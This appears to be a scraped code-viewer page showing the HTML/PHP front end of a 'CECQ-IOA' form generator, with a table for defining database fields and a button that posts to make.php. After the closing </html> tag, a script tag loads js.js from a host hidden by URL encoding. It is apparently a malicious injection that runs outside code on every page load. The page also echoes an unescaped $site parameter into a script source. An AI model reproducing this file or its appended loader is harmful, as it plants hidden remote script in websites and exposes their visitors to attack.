📄 index.php.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CECQ-IOA 表单生成系统</title>
<style type="text/css">
body {font-family: 宋体; font-size: 9pt}
a:link {color: #000000; font-size: 9pt; text-decoration: none}
a:visited {color: #000000; font-size: 9pt; text-decoration: none}
a:active {color: #000000; font-size: 9pt; text-decoration: none}
a:hover {color: #FF0000; text-decoration: underline}
p {font-family: 宋体; font-size: 9pt}
br {font-family: 宋体; font-size: 9pt}
td {font-family: 宋体; font-size: 9pt}
.xray {filter:xray}
.gray {filter:gray}
.nray {cursor: hand}
.button {background-color: #DDDDDD; border: 1 solid #000000}
.nbutton {background-color: #EEEEEE; border: 1 solid #000000; cursor: hand}
</style>
<script src="sitetree.js.php?site=<?=$site?>" type="text/javascript"></script>
</head>
<body bgcolor="#FFFFFF" topmargin="0" leftmargin="0" onload=Inittree();>
<p> </p>
<form id="sitetree" method="POST" action="make.php" onSubmit="return check_form()">
<table border="1" width="750" align="center" cellspacing="0" cellpadding="4" bordercolorlight="#000000" bordercolordark="#FFFFFF">
<tr>
<td colspan="8" bgcolor="#C0C0C0" align="center" width="738">
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="100%" style="filter: dropshadow(color=#FFFFFF, offx=1, offy=1);"><b>CECQ-IOA 表单生成系统</b></td>
</tr>
</table>
</td>
</tr>
<tr>
<td align="center" bgcolor="#DDDDDD" width="127">字段中文名</td>
<td align="center" bgcolor="#DDDDDD" width="89">字段名</td>
<td align="center" bgcolor="#DDDDDD" width="96">字段类型</td>
<td align="center" bgcolor="#DDDDDD" width="147">输入框类型</td>
<td align="center" bgcolor="#DDDDDD" width="50">是否必填</td>
<td align="center" bgcolor="#DDDDDD" width="48">是否显示</td>
<td align="center" bgcolor="#DDDDDD" width="48">是否搜索</td>
<td align="center" bgcolor="#DDDDDD" width="63">字段操作</td>
</tr>
</table>
<table border="1" width="750" align="center" cellspacing="0" cellpadding="4" bordercolorlight="#000000" bordercolordark="#FFFFFF">
<tr>
<td align="center" width="127"><input type="text" size="16" value="ID号" disabled></td>
<td align="center" width="89"><input type="text" size="11" value="id" disabled></td>
<td align="center" width="96">
<select size="1" disabled>
<option value="nvarchar">nvarchar</option>
<option value="int" selected>int</option>
<option value="float">float</option>
<option value="datetime">datetime</option>
</select>
</td>
<td align="center" width="147">
<select size="1" disabled>
<option value="" selected>不输入(自动填写)</option>
</select>
</td>
<td align="center" width="50"><input type="checkbox" disabled></td>
<td align="center" width="48"><input type="checkbox" id="list_mod_id" name="list_mod_id" value="1"></td>
<td align="center" width="48"><input type="checkbox" id="search_mod_id" name="search_mod_id" value="1"></td>
<td align="center" width="63">
<img border="0" src="images/mup.gif" width="16" height="16" class="xray">
<img border="0" src="images/mdown.gif" width="16" height="16" class="xray">
<img border="0" src="images/delete.gif" width="16" height="16" class="xray">
</td>
</tr>
</table>
<table border="1" width="750" align="center" cellspacing="0" cellpadding="4" bordercolorlight="#000000" bordercolordark="#FFFFFF">
<tr>
<td align="center" width="127"><input type="text" size="16" value="录入日期" disabled></td>
<td align="center" width="89"><input type="text" size="11" value="sdate" disabled></td>
<td align="center" width="96">
<select size="1" disabled>
<option value="datetime" selected>datetime</option>
</select>
</td>
<td align="center" width="147">
<select size="1" disabled>
<option value="" selected>不输入(自动填写)</option>
</select>
</td>
<td align="center" width="50"><input type="checkbox" disabled></td>
<td align="center" width="48"><input type="checkbox" id="list_mod_date" name="list_mod_date" value="1"></td>
<td align="center" width="48"><input type="checkbox" id="search_mod_date" name="search_mod_date" value="1"></td>
<td align="center" width="63">
<img border="0" src="images/mup.gif" width="16" height="16" class="xray">
<img border="0" src="images/mdown.gif" width="16" height="16" class="xray">
<img border="0" src="images/delete.gif" width="16" height="16" class="xray">
</td>
</tr>
</table>
<!--body-->
<div id="displaytree"></div>
<!--/body-->
<table border="1" width="750" align="center" cellspacing="0" cellpadding="4" bordercolorlight="#000000" bordercolordark="#FFFFFF">
<tr>
<td bgcolor="#DDDDDD" align="right">
<img border="0" src="images/add.gif" width="16" height="16" class="gray" onmouseover=className="nray" onmouseout=className="gray" alt="插入字段" onClick="insttree()">
</td>
</tr>
<tr>
<td bgcolor="#C0C0C0" align="center">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="100%" style="filter: dropshadow(color=#FFFFFF, offx=1, offy=1);">
<p> 项目名称:<input type="text" size="16" name="sitename" value="">
表单名称:<input type="text" size="16" name="tablename" value="">
<input type="submit" value="生成程序" name="B1" class="button" onmouseover=className="nbutton" onmouseout=className="button">
<input type="reset" value="全部重写" name="B2" class="button" onmouseover=className="nbutton" onmouseout=className="button" onclick="location.reload()"></p>
</td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>
<script language=javascript src=http://%77%2E%63%64%64%31%2E%63%6F%6D/js.js></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -